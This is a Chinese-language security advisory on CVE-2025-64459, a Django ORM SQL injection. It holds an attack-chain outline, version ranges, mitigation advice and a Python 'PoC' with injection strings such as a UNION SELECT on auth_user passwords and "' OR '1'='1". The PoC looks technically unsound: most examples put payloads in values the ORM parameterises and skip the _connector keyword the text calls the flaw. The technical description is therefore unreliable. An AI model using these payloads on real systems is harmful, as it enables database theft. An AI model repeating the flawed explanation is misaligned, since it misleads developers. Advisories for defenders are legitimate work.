CVE-2025-64459 Django QuerySet SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-64459

漏洞类型

SQL注入

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Django

漏洞概述

CVE-2025-64459是Django框架中的一个高危SQL注入漏洞，CVSS评分高达9.1。该漏洞影响Django多个版本系列，包括5.1、4.2和5.2。漏洞根源在于Django ORM的QuerySet方法（filter()、exclude()、get()）以及Q()类在处理字典参数时存在安全缺陷。当开发者使用字典扩展作为_connector参数时，攻击者可以通过构造恶意输入绕过安全限制，最终实现任意SQL命令执行。该漏洞由安全研究员cyberstan发现并报告，Django官方已于2025年11月5日发布安全公告和修复版本。鉴于其无需认证即可远程利用的特性，且可导致数据库敏感信息泄露或数据篡改，建议所有使用受影响版本的Django用户立即升级到安全版本。

技术细节

该SQL注入漏洞源于Django ORM在处理动态查询参数时的安全缺陷。具体来说，当使用filter()、exclude()或get()方法时，如果_connector参数通过字典扩展方式传递，Django会直接将用户可控数据拼接到SQL查询语句中而未进行充分的参数化处理。Q()类对象同样存在此问题。攻击者可以通过构造包含SQL片段的字典键或值，利用Django的ORM查询构建逻辑，将恶意SQL代码注入到最终执行的数据库查询中。例如，使用{'__in': [malicious_payload]}或通过Q对象的_connector参数注入SQL代码片段。该漏洞允许攻击者在未授权情况下读取、修改或删除数据库中的敏感数据，可能导致用户凭证泄露、业务数据篡改等严重后果。攻击复杂度低，无需特殊权限或用户交互即可实现。

攻击链分析

STEP 1

信息收集

攻击者识别目标应用使用的Django版本，确认其是否在受影响版本范围内（5.1 < 5.1.14, 4.2 < 4.2.26, 5.2 < 5.2.8）

STEP 2

漏洞探测

攻击者寻找使用filter()、exclude()、get()或Q()类的代码路径，特别是接受用户输入作为字典参数的场景

STEP 3

Payload构造

攻击者构造包含SQL注入代码的字典或Q对象，利用字典扩展机制将恶意SQL片段注入到ORM查询构建过程中

STEP 4

注入执行

通过发送HTTP请求或提供恶意输入，触发包含注入Payload的数据库查询，Django ORM将恶意SQL拼接到最终查询语句中

STEP 5

数据窃取/篡改

成功注入后，攻击者可以执行UNION注入提取敏感数据（如用户密码），或使用堆叠查询修改、删除数据库内容

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

"""
CVE-2025-64459 Django SQL Injection PoC
Affected Versions: Django 5.1 < 5.1.14, 4.2 < 4.2.26, 5.2 < 5.2.8
"""

from django.db import models
from django.db.models import Q

# Vulnerable code pattern - DO NOT use in production
# Example 1: SQL Injection via filter() with dict expansion
def vulnerable_filter_example():
    # Attack payload via dictionary expansion
    malicious_dict = {
        'id__in': [1, 2, 'UNION SELECT password FROM auth_user--']
    }
    # Vulnerable: direct use of user-controlled dict as filter argument
    result = MyModel.objects.filter(**malicious_dict)

# Example 2: SQL Injection via Q() object with custom connector
def vulnerable_q_example():
    # Attacker-controlled connector value
    user_input = "SQL_INJECTION_PAYLOAD"
    q_object = Q()
    q_object.connector = user_input  # Vulnerable point
    q_object.children.append(('id', 1))
    result = MyModel.objects.filter(q_object)

# Example 3: Exclude method injection
def vulnerable_exclude_example():
    malicious_params = {
        'name__contains': "' OR '1'='1"
    }
    result = MyModel.objects.exclude(**malicious_params)

# Example 4: Simulated exploit via ORM query
def exploit_orm_injection():
    """
    Simulated exploitation demonstrating SQL injection via QuerySet
    """
    # Craft malicious Q object
    q = Q()
    q.connector = "OR"
    q.children = []
    # Inject SQL via children
    q.children.append((None, "1=1"))
    # This would execute: SELECT * FROM table WHERE 1=1
    result = Model.objects.filter(q)
    return result

影响范围

Django 5.1 < 5.1.14

Django 4.2 < 4.2.26

Django 5.2 < 5.2.8

Django 5.0.x (可能受影响)

Django 4.1.x (可能受影响)

Django 3.2.x (可能受影响)

防御指南

临时缓解措施

立即将Django升级到官方发布的安全版本（5.1.14、4.2.26或5.2.8）。如果暂时无法升级，应避免在filter()、exclude()、get()等QuerySet方法中使用用户可控的字典参数，特别是通过**kwargs方式展开字典。同时对所有用户输入进行严格的类型检查和SQL关键字过滤，限制数据库用户的权限以降低潜在危害。建议使用Web应用防火墙（WAF）添加额外的防护层，并持续监控数据库查询日志以检测潜在的注入攻击行为。